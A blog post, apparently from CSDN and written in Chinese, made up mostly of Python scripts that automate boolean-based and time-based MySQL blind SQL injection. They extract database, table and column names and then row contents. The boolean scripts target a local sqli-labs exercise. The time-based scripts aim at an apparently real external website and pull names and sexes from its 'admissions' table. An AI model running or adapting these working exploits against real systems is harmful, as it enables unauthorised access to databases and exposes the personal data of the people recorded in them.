mysql盲注脚本

于 2025-02-13 13:01:00 发布
阅读量309 收藏 3
点赞数 9
文章标签: 数据库 oracle
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_73826546/article/details/145608290
版权

1布尔盲注

        1 爆数据库名称

import requests
#1爆数据库名字
def blind_sql_injection(url):
    database_name = ""
    last_database_name = ""  # 上一次的数据库名
    i = 1
    while True:
        low = 32  # ASCII码的最小值
        high = 126  # ASCII码的最大值(可打印字符)
        while low <= high:
            mid = (low + high) // 2
            # 构造Payload,判断当前字符的ASCII码是否大于mid
            payload = f"1' and ascii(substr(database(),{i},1))>{mid}-- -"
            full_url = f"{url}?id={payload}"
            response = requests.get(full_url)
            if "You are in..........." in response.text:  # 你的提示字符串需要根据实际情况调整
                low = mid + 1  # 当前字符的ASCII码大于mid
            else:
                high = mid - 1  # 当前字符的ASCII码小于或等于mid
        # 当low > high时,说明找到了当前字符的ASCII码
        if low > high:
            char = chr(low)
            if char == '\x00':  # 如果字符为空,表示数据库名称已猜完
                print(f"Final database name: {database_name}")
                break  # 退出外层循环
            # 防止添加多余的空格
            if char != ' ':
                database_name += char
            print(f"Current database name: {database_name}")
            i += 1

            # 检查数据库名称是否已经稳定(即与上一次相同)
            if database_name == last_database_name:
                print("Database name has stabilized, ending loop.")
                break

            # 更新上一次的数据库名称
            last_database_name = database_name
        else:
            # 如果没有找到字符,说明数据库名称已猜完
            break
    return database_name

运行截图

2爆指定数据库的表名

import requests

def blind_sql_injection(url):
    database_name = ""
    last_database_name = ""  # 上一次的数据库名
    i = 1
    while True:
        low = 32  # ASCII码的最小值
        high = 126  # ASCII码的最大值(可打印字符)
        while low <= high:
            mid = (low + high) // 2
            # 构造Payload,判断当前字符的ASCII码是否大于mid
            payload = f"1' AND ascii(substr((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='security'),{i},1)) > {mid} -- -"
            full_url = f"{url}?id={payload}"
            response = requests.get(full_url)
            if "You are in..........." in response.text:  # 你的提示字符串需要根据实际情况调整
                low = mid + 1  # 当前字符的ASCII码大于mid
            else:
                high = mid - 1  # 当前字符的ASCII码小于或等于mid
        # 当low > high时,说明找到了当前字符的ASCII码
        if low > high:
            char = chr(low)
            if char == '\x00':  # 如果字符为空,表示数据库名称已猜完
                print(f"Final database name: {database_name}")
                break  # 退出外层循环
            # 防止添加多余的空格
            if char != ' ':
                database_name += char
            print(f"Current database name: {database_name}")
            i += 1

            # 检查数据库名称是否已经稳定(即与上一次相同)
            if database_name == last_database_name:
                print("Database name has stabilized, ending loop.")
                break

            # 更新上一次的数据库名称
            last_database_name = database_name
        else:
            # 如果没有找到字符,说明数据库名称已猜完
            break
    return database_name


if __name__ == "__main__":
    url = "http://127.0.0.1/sqli-labs-master/Less-8/"
    db_name = blind_sql_injection(url)
    print(f"Database name: {db_name}")

运行截图

3爆指定库指定表的列名

import requests

def blind_sql_injection(url):
    database_name = ""
    last_database_name = ""  # 上一次的数据库名
    i = 1
    while True:
        low = 32  # ASCII码的最小值
        high = 126  # ASCII码的最大值(可打印字符)
        while low <= high:
            mid = (low + high) // 2
            # 构造Payload,判断当前字符的ASCII码是否大于mid
            payload = f"1' AND ascii(substr((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='security' and table_name='users'),{i},1)) > {mid} -- -"
            full_url = f"{url}?id={payload}"
            response = requests.get(full_url)
            if "You are in..........." in response.text:  # 你的提示字符串需要根据实际情况调整
                low = mid + 1  # 当前字符的ASCII码大于mid
            else:
                high = mid - 1  # 当前字符的ASCII码小于或等于mid
        # 当low > high时,说明找到了当前字符的ASCII码
        if low > high:
            char = chr(low)
            if char == '\x00':  # 如果字符为空,表示数据库名称已猜完
                print(f"Final database name: {database_name}")
                break  # 退出外层循环
            # 防止添加多余的空格
            if char != ' ':
                database_name += char
            print(f"Current database name: {database_name}")
            i += 1

            # 检查数据库名称是否已经稳定(即与上一次相同)
            if database_name == last_database_name:
                print("Database name has stabilized, ending loop.")
                break

            # 更新上一次的数据库名称
            last_database_name = database_name
        else:
            # 如果没有找到字符,说明数据库名称已猜完
            break
    return database_name


if __name__ == "__main__":
    url = "http://127.0.0.1/sqli-labs-master/Less-8/"
    db_name = blind_sql_injection(url)
    print(f"Database name: {db_name}")

运行截图

4爆指定表内容

import requests
#
#爆表内容
def blind_sql_injection(url):
    database_name = ""
    last_database_name = ""  # 上一次的数据库名
    i = 1
    while True:
        low = 32  # ASCII码的最小值
        high = 126  # ASCII码的最大值(可打印字符)
        while low <= high:
            mid = (low + high) // 2
            # 构造Payload,判断当前字符的ASCII码是否大于mid
            payload = f"1' AND ascii(substr((SELECT group_concat(username) FROM users),{i},1)) > {mid} -- -"
            full_url = f"{url}?id={payload}"
            response = requests.get(full_url)
            if "You are in..........." in response.text:  # 你的提示字符串需要根据实际情况调整
                low = mid + 1  # 当前字符的ASCII码大于mid
            else:
                high = mid - 1  # 当前字符的ASCII码小于或等于mid
        # 当low > high时,说明找到了当前字符的ASCII码
        if low > high:
            char = chr(low)
            if char == '\x00':  # 如果字符为空,表示数据库名称已猜完
                print(f"Final database name: {database_name}")
                break  # 退出外层循环
            # 防止添加多余的空格
            if char != ' ':
                database_name += char
            print(f"Current database name: {database_name}")
            i += 1

            # 检查数据库名称是否已经稳定(即与上一次相同)
            if database_name == last_database_name:
                print("Database name has stabilized, ending loop.")
                break

            # 更新上一次的数据库名称
            last_database_name = database_name
        else:
            # 如果没有找到字符,说明数据库名称已猜完
            break
    return database_name


if __name__ == "__main__":
    url = "http://127.0.0.1/sqli-labs-master/Less-8/"
    db_name = blind_sql_injection(url)
    print(f"Database name: {db_name}")

运行截图

2时间盲注

1爆数据库名

import requests
import time  # 导入 time 模块

def blind_sql_injection(url):
    database_name = ""
    last_database_name = ""  # 上一次的数据库名
    i = 1
    while True:
        low = 32  # ASCII码的最小值
        high = 126  # ASCII码的最大值(可打印字符)
        while low <= high:
            mid = (low + high) // 2
            # 构造Payload,判断当前字符的ASCII码是否大于mid
            payload = f"4 AND if(ascii(substr(database(),{i},1)) > {mid},sleep(2),0)"
            full_url = url+payload # 拼接完整的URL,记得加上问号参数
            begin = time.time()  # 记录请求开始时间
            response = requests.get(full_url)
            end = time.time()  # 记录请求结束时间

            # 判断响应时间是否延迟了2秒,来判断字符的ASCII码是否大于mid
            response_time = end - begin
            print(f"Testing {chr(mid)} - Response time: {response_time:.2f}s")  # 输出当前字符和响应时间

            if response_time >= 2:  # 如果响应时间大于等于2秒,说明当前字符的ASCII码大于mid
                low = mid + 1
            else:
                high = mid - 1

        # 当low > high时,说明找到了当前字符的ASCII码
        if low > high:
            char = chr(low)
            if char == '\x00':  # 如果字符为空,表示数据库名称已猜完
                print(f"Final database name: {database_name}")
                break  # 退出外层循环
            # 防止添加多余的空格
            if char != ' ':
                database_name += char
            print(f"Current database name: {database_name}")
            i += 1

            # 检查数据库名称是否已经稳定(即与上一次相同)
            if database_name == last_database_name:
                print("Database name has stabilized, ending loop.")
                break

            # 更新上一次的数据库名称
            last_database_name = database_name
        else:
            # 如果没有找到字符,说明数据库名称已猜完
            break
    return database_name


if __name__ == "__main__":
    url = "http://zs.bxait.cn/list/"  # 填写正确的URL
    db_name = blind_sql_injection(url)
    print(f"Database name: {db_name}")

运行截图

2爆数据表名

import requests
import time  # 导入 time 模块

def blind_sql_injection(url):
    database_name = ""
    last_database_name = ""  # 上一次的数据库名
    i = 1
    while True:
        low = 32  # ASCII码的最小值
        high = 126  # ASCII码的最大值(可打印字符)
        while low <= high:
            mid = (low + high) // 2
            # 构造Payload,判断当前字符的ASCII码是否大于mid
            payload = f"4 AND if(ascii(substr((SELECT group_concat(table_name) FROM information_schema.tables WHERE table_schema='gsxy_com'),{i},1)) > {mid},sleep(2),0)"
            full_url = url+payload # 拼接完整的URL,记得加上问号参数
            begin = time.time()  # 记录请求开始时间
            response = requests.get(full_url)
            end = time.time()  # 记录请求结束时间

            # 判断响应时间是否延迟了2秒,来判断字符的ASCII码是否大于mid
            response_time = end - begin
            print(f"Testing {chr(mid)} - Response time: {response_time:.2f}s")  # 输出当前字符和响应时间

            if response_time >= 2:  # 如果响应时间大于等于2秒,说明当前字符的ASCII码大于mid
                low = mid + 1
            else:
                high = mid - 1

        # 当low > high时,说明找到了当前字符的ASCII码
        if low > high:
            char = chr(low)
            if char == '\x00':  # 如果字符为空,表示数据库名称已猜完
                print(f"Final database name: {database_name}")
                break  # 退出外层循环
            # 防止添加多余的空格
            if char != ' ':
                database_name += char
            print(f"Current database name: {database_name}")
            i += 1

            # 检查数据库名称是否已经稳定(即与上一次相同)
            if database_name == last_database_name:
                print("Database name has stabilized, ending loop.")
                break

            # 更新上一次的数据库名称
            last_database_name = database_name
        else:
            # 如果没有找到字符,说明数据库名称已猜完
            break
    return database_name


if __name__ == "__main__":
    url = "http://zs.bxait.cn/list/"  # 填写正确的URL
    db_name = blind_sql_injection(url)
    print(f"Database name: {db_name}")

 运行截图

3爆字段名

import requests
import time  # 导入 time 模块

def blind_sql_injection(url):
    database_name = ""
    last_database_name = ""  # 上一次的数据库名
    i = 1
    while True:
        low = 32  # ASCII码的最小值
        high = 126  # ASCII码的最大值(可打印字符)
        while low <= high:
            mid = (low + high) // 2
            # 构造Payload,判断当前字符的ASCII码是否大于mid
            payload = f"4 AND if(ascii(substr((SELECT group_concat(column_name) FROM information_schema.columns WHERE table_schema='gsxy_com' and table_name='admissions'),{i},1)) > {mid},sleep(2),0)"
            full_url = url+payload # 拼接完整的URL,记得加上问号参数
            begin = time.time()  # 记录请求开始时间
            response = requests.get(full_url)
            end = time.time()  # 记录请求结束时间

            # 判断响应时间是否延迟了2秒,来判断字符的ASCII码是否大于mid
            response_time = end - begin
            print(f"Testing {chr(mid)} - Response time: {response_time:.2f}s")  # 输出当前字符和响应时间

            if response_time >= 2:  # 如果响应时间大于等于2秒,说明当前字符的ASCII码大于mid
                low = mid + 1
            else:
                high = mid - 1

        # 当low > high时,说明找到了当前字符的ASCII码
        if low > high:
            char = chr(low)
            if char == '\x00':  # 如果字符为空,表示数据库名称已猜完
                print(f"Final database name: {database_name}")
                break  # 退出外层循环
            # 防止添加多余的空格
            if char != ' ':
                database_name += char
            print(f"Current database name: {database_name}")
            i += 1

            # 检查数据库名称是否已经稳定(即与上一次相同)
            if database_name == last_database_name:
                print("Database name has stabilized, ending loop.")
                break

            # 更新上一次的数据库名称
            last_database_name = database_name
        else:
            # 如果没有找到字符,说明数据库名称已猜完
            break
    return database_name


if __name__ == "__main__":
    url = "http://zs.bxait.cn/list/"  # 填写正确的URL
    db_name = blind_sql_injection(url)
    print(f"Database name: {db_name}")

4爆表内容

import requests
import time  # 导入 time 模块

def blind_sql_injection(url):
    database_name = ""
    last_database_name = ""  # 上一次的数据库名
    i = 1
    while True:
        low = 32  # ASCII码的最小值
        high = 126  # ASCII码的最大值(可打印字符)
        while low <= high:
            mid = (low + high) // 2
            # 构造Payload,判断当前字符的ASCII码是否大于mid
            payload = f"4 AND if(ascii(substr((SELECT group_concat(s_name-s_sex) FROM admissions),{i},1)) > {mid},sleep(2),0)"
            full_url = url+payload # 拼接完整的URL,记得加上问号参数
            begin = time.time()  # 记录请求开始时间
            response = requests.get(full_url)
            end = time.time()  # 记录请求结束时间

            # 判断响应时间是否延迟了2秒,来判断字符的ASCII码是否大于mid
            response_time = end - begin
            print(f"Testing {chr(mid)} - Response time: {response_time:.2f}s")  # 输出当前字符和响应时间

            if response_time >= 2:  # 如果响应时间大于等于2秒,说明当前字符的ASCII码大于mid
                low = mid + 1
            else:
                high = mid - 1

        # 当low > high时,说明找到了当前字符的ASCII码
        if low > high:
            char = chr(low)
            if char == '\x00':  # 如果字符为空,表示数据库名称已猜完
                print(f"Final database name: {database_name}")
                break  # 退出外层循环
            # 防止添加多余的空格
            if char != ' ':
                database_name += char
            print(f"Current database name: {database_name}")
            i += 1

            # 检查数据库名称是否已经稳定(即与上一次相同)
            if database_name == last_database_name:
                print("Database name has stabilized, ending loop.")
                break

            # 更新上一次的数据库名称
            last_database_name = database_name
        else:
            # 如果没有找到字符,说明数据库名称已猜完
            break
    return database_name


if __name__ == "__main__":
    url = "http://zs.bxait.cn/list/"  # 填写正确的URL
    db_name = blind_sql_injection(url)
    print(f"Database name: {db_name}")

运行截图

m0_73826546
关注
mysql总结
z7sz的博客
06-21 1229
本文的内容主要是对mysql的总结
MySQL
聚鼎安全
01-08 794
这里写目录标题布尔时间sleep函数benchmark函数笛卡尔积函数get_lock正则DOS RLIKE入dnslog后续待补充 布尔 一般先看长度 id=4 and length(user())=14 布尔的方法 substr,substring,mid,left,right截取单个字符 id=4 and substr((select user()),1,1)=0x72 id=4 and left((select user()),1)=0x72 用ascii(),or
mysql入之语句汇总
sirius的博客
08-28 4655
目录 mysql入之 常用语句汇总 基于bool 查询当前数据库 基于时间的 常用函数: regexp正则入 like匹配入 特殊的之报错mysql入之 什么是? 基于布尔型SQL即在SQL入过程中,应用程序仅仅返回True(页面)和False(页面)。 就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
Mysql总结
b1ackc4t的博客
01-24 3036
Mysql 当我们无法从显示的页面上直接获取SQL语句的执行结果时,需要进行 手工的基本步骤 判断是否存在入 字符型还是数值型 猜解当前数据库名 猜解数据库的表名 猜解表中的字段名 猜解数据 下面,我们探讨一下常见的三种 基于报错的 利用条件 系统未关闭数据库报错信息,对于一些sql错误直接回显在了错误上 未对报错函数进行过滤 group by key报错 原理 当在一个聚合函数,比如CONUNT函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来, co
MySQL
xu_1234567的博客
09-25 484
1.MySQL入原理 MySQL入是在网址追加MySQL IF查询判断语句,通过网页输出来准确判断出ASCII码的值,拿到ASCII码后得到数据库名 2.MySQL函数 在进行MySQL入,的使用以下MySQL函数 database() 查看数据库名 substr(str,1,4) 字符串截取 mid(str,1,4) 字符串截取 ascii码 if (条件,True,False) database() substr(str,1,4) if(条件,1,0) 3.入测试 ...
mysql
m0_65096687的博客
04-09 171
仍然要判断字符类型入,可以根据页面的反应。1 and 1=2 如果页面显示正常,那么就是字符型入,因为如果是数字,不成立,会有异常。所以第一步仍是判断入类型就是存在入但是页面上没有任何回显。分为布尔和时间
基于DVWA靶场的脚本
altersueyunsheng的博客
05-28 533
基于DVWA的自动脚本 本文针对的是dvwa部分的low级别的自动入,关于概念等就不做介绍了。相比较有回显的入,这种入方式要多次猜解,比如数据库名,需要猜解出其长度,再依据长度多次循环猜解出每个字母,最后得到数据库名。 布尔 dvwa猜解正确会回显"User ID…",以此作为判断是否入成功,headers为自己构造的头部信息。 def judge_sql_inject(sql, url, headers): # 返回判断, str = f'?id={sql}&am
sqllabs 脚本
02-11
下面是一个简单的Python布尔脚本框架: ```python import requests target_url = "http://192.168.2.15/sqli-labs/Less-7/" true_string = "You are in" def check_true(payload): params = {'id': payload}...
pikachu sql脚本
最新发布
03-16
### Pikachu 系统 SQL 入漏洞利用脚本 针对 `pikachu` 系统中的 SQL 入漏洞,可以借助自动化工具如 `sqlmap` 或者手动编写脚本来实现漏洞的验证与利用。以下是基于已知信息的相关说明以及可能的脚本示例。 ###...
pikachu sql 脚本pyhon
01-03
### SQL的Python脚本 对于SQL攻击,可以编写一个简单的Python脚本来实现布尔型入或时间延迟入。下面是一个基于布尔型入原理的简单示例: ```python import requests target_url = ...
mysql 脚本大全
qq_61774705的博客
08-02 112
MySQL中查询所有数据库名和表名1.查询所有数据库2.查询指定数据库中所有表名3.查询指定表中的所有字段名(select group_concat(column_name) from information_schema.columns where table_name='表名')4.查询指定字段中的内容(select group_concat(字段名) from 数据库.表名) ,(select group_concat(username) from security.users)......
sql入之
weixin_64815500的博客
06-19 1862
sql入关于无回显用到的,sqli-labs靶场为例子讲解常用类型以及函数。面试或者打ctf可用作参考
MySQL延时
一个普普通通的博客
03-01 1645
Mysql延时
自己整理MySQL
明哥哥知识分享
08-17 1257
一、基于时间延时的:SLEEP 函数 SLEEP( 数字) 函数使用说明:延迟函数,为真时会延时执行代码,为假则不会执行延时。(数字为整数,例:1就是延迟一秒执行。) 例如: Select * from 表名 where id=1 and sleep(2); 有这个id=1的内容延迟2秒执行,没有则相反。 二、配合if条件触发 IF(expr1, expr2, expr3) 如果IF(1>2, 真, 假)是true,那它的返回值就是真,如果执行条件是false,执行的条件就是假,具体情况视其所在
MySQL—布尔
一个普普通通的博客
03-01 1696
Mysql入—布尔
基于错误信息的SQL
海枫的专栏
11-05 7844
如果不知道网站上的SQL拼接方式,那该怎么利用错误信息进行SQL了,快来围观吧
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值